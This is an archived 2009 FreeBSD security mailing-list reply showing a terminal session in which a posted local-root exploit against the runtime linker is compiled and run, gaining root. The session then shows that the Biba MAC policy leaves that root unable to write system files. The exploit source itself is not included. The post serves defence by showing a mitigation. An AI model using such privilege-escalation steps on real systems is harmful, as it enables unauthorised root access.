From owner-freebsd-security@FreeBSD.ORG Tue Dec 1 18:01:15 2009 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 4AD0D106568B; Tue, 1 Dec 2009 18:01:13 +0000 (UTC) (envelope-from borjam@sarenet.es) Received: from proxypop1.sarenet.es (proxypop1.sarenet.es [194.30.0.99]) by mx1.freebsd.org (Postfix) with ESMTP id 07EB28FC14; Tue, 1 Dec 2009 18:01:12 +0000 (UTC) Received: from [172.16.1.204] (izaro.sarenet.es [192.148.167.11]) by proxypop1.sarenet.es (Postfix) with ESMTP id 080CC5CA2; Tue, 1 Dec 2009 18:41:19 +0100 (CET) Mime-Version: 1.0 (Apple Message framework v1077) Content-Type: text/plain; charset=us-ascii From: Borja Marcos In-Reply-To: <200912010120.nB11Kjm9087476@freefall.freebsd.org> Date: Tue, 1 Dec 2009 18:41:07 +0100 Content-Transfer-Encoding: 7bit Message-Id: References: <200912010120.nB11Kjm9087476@freefall.freebsd.org> To: freebsd-security@freebsd.org X-Mailer: Apple Mail (2.1077) Cc: FreeBSD Security Advisories Subject: Re: Upcoming FreeBSD Security Advisory X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 01 Dec 2009 18:01:15 -0000 On Dec 1, 2009, at 2:20 AM, FreeBSD Security Officer wrote: > A short time ago a "local root" exploit was posted to the full-disclosure > mailing list; as the name suggests, this allows a local user to execute > arbitrary code as root. Dr. Strangelove, or How I learned to love the MAC subsystem. # uname -a FreeBSD test 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Fri Nov 20 13:20:06 CET 2009 root@test:/usr/obj/usr/src/sys/TEST amd64 $ gcc -o program.o -c program.c -fPIC $ gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles $ ./env /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # id uid=1001(user) gid=1001(user) euid=0(root) groups=1001(portero),0(wheel) # /usr/sbin/getpmac biba/high(low-high) And of course it's root. Now, $ setpmac biba/low\(low-low\) csh %pwd /tmp %./env /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # ** OMG!! IT WORKED!!. BUT # touch /etc/testing_the_exploit touch: /etc/testing_the_exploit: Permission denied # ls -l /usr/sbin/getpmac -r-xr-xr-x 1 root wheel 7144 May 1 2009 /usr/sbin/getpmac # /usr/sbin/getpmac biba/low(low-low) OOHHHHH, we have a toothless root. Maybe a "riit"? Pity these serious security mechanisms don't get a widespread usage. Borja.